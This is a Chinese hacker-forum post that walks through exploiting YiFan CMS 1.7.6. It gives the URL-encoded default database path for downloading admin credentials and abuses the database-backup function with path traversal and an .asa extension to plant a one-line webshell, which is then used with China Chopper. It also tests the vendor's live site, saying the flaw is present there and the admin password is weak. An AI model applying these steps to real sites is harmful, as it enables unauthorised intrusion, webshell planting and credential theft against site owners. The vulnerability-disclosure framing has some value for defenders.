艺帆CMS漏洞分析和官网测试 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

艺帆CMS漏洞分析和官网测试

admin 渗透提权

首先,这个艺帆cms的官网、论坛、演示站,从老版本我就测试和提交给官方了

可惜石沉大海 希望能够重视啊~

1. 环境

本地虚拟机搭建IIS+YF_CMS1.7.6V最新版
官方网站seo.i5808.com
资源标题:艺帆企业CMS1.7.6V
演示网站:http://seo.i5808.com
官方论坛:http://www.i5808.com
关键词:艺帆企业CMS1.7.6V,YifanFCMS,免费cms,企业CMS
类型:asp/access

功能:单页设置 单页分类设置 新闻 产品 下载 在线招聘 在线留言 会员系统 在线下单 幻灯管理 友情链接管理 数据库备份 

艺帆企业CMS1.7.6V蜕变上线_全新后台界面!全新通用模板

集成1.7版本中的全部优势项目,

1.7.6版本以其它版本的区别:更加简约方便的后台管理设计,因为很多用户反应,取消了艺帆以往版本中一直有的异步加载功能。
 
更新:对整体数据结构和读取方式进行了优化,界面全新设计,取消之前版本中使用率偏少的JS脚本,加快运行,新增了插件拓展功能(更多艺帆企业CMS插件陆续上线中),
 
特色功能:简约代码,让你的网站轻快流畅。全站DIV+CSS 自动伪静态.html结尾 关键词自动匹配设置 全面针对搜索引擎优化。图片批量上传,省去一张张上传的烦恼。
 
模板库:精准行业定位,发现品牌设计的价值。每一个企业网站模板都属于自己的一个调性,亦或是可以说是一个卖点(产品诉求),一种情感的表达。我们一直在设计中
融入这样的氛围,带入浏览者的感觉。
 
安全:道高一尺,强力保护您的爱站,不定时收集反馈BUG和漏洞,不定时的更新安全防护。让您的爱站每天接受体检,享受免费医疗的福利。(真的吗? 原来提交咋不理我呢~)
 
其他说明:首页幻灯才用JS而非Flash ,搜索引擎蜘蛛更能识别并爬到相关链接,没有缩略图的新闻会自动显示暂无图片,所有链接图片均有alt注释和title标注
 
全站完整无错,如无法架设可以去论坛看下教程
后台地址:i5808  账号:i5808 密码:123456

2. 目的

 测试新版YF(艺帆)_CMS1.7.6V

3. 流程

 访问看下首页,新版本布局改动挺大的~

 

直接访问下后台吧~

 

恩。挺漂亮的,好吧,看看怎么获取账号密码吧~

注入看来是不行的,新版对sql注入好像修正了不少~

我们直接看默认数据的路径和默认名吧~

OneFCMS_Data/OneFCMS$%#$#Data$%#2012#$11$$#7.mdb

直接测试官网下

返回

 

好吧,看来有井号不行,直接改下编码

 

恩,然后访问:

OneFCMS_Data/%4F%6E%65%46%43%4D%53%24%25%23%24%23%44%61%74%61%24%25%23%32%30%31%32%23%24%31%31%24%24%23%37%2E%6D%64%62

丢给迅雷

 

好了 直接就下载了~~不做防下载处理,直接文件名加井号,这个太不负责任了撒~打开数据库看下管理员账号密码:

 

很好,解密后我们登陆后台~

 

后台风格做的不错哈~

然后我们果断找到数据库备份的地方

 

看看能不能直接备份成asp

 

看来是不行的,但是这种过滤往往是黑名单,不允许asp,意味着aspx也不行,好在我们有asacer可以用,来试试看~

 

这里我加了两个../意思是往上级目录跳两级,顺便测试父路径封锁了没,如果备份好的路径不能执行脚本的话,我们就可以用这个漏洞吧马写到别的目录里面去,顺便测一下吧~

 

恩,asa成功写入,父路径看来也跳成功了~

声明下,我这里是在文章编辑里上传了一个一句话木马的图片,把图片直接备份成asa的马,当然大家可以随意找地方写一个数据库一句话木马:┼攠數畣整爠煥敵瑳∨≡┩愾,然后备份整个数据库成.asa的马。都可以~

好的,访问下木马试试,刚才我吧路径等于是跳到根目录了~

 

恩成功的显示了图片的内容,木马的内容应该执行了,接着菜刀连接吧~

OK,菜刀连接正常。

接着我们看看为什么新版本的注入漏洞都没了。

 

这里后台有一个很灵活的防注入插件啊,封几个语句的话,注入估计就有难度了。

好吧,接着我们测测官网有木有这个数据库漏洞~

 

毫无疑问,我是掉进坑里的,~这个数据库可下载的漏洞提交给官方好几次了,不重视啊~好心当驴肝肺了,算了,就不搞他了截图走人。

对了,更坑爹的是,官网的密码是他们的客服QQ号,搞社工的 应该是秒进后台吧?

4. 总结

1.数据库默认路径默认数据库名未做放下载措施
2.数据库备份漏洞
未过滤asa,cer等等可执行脚本后缀名
未禁用父路径写文件
3.官网弱口令,直接就用QQ号当后台密码
标签: 艺帆CMS漏洞

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表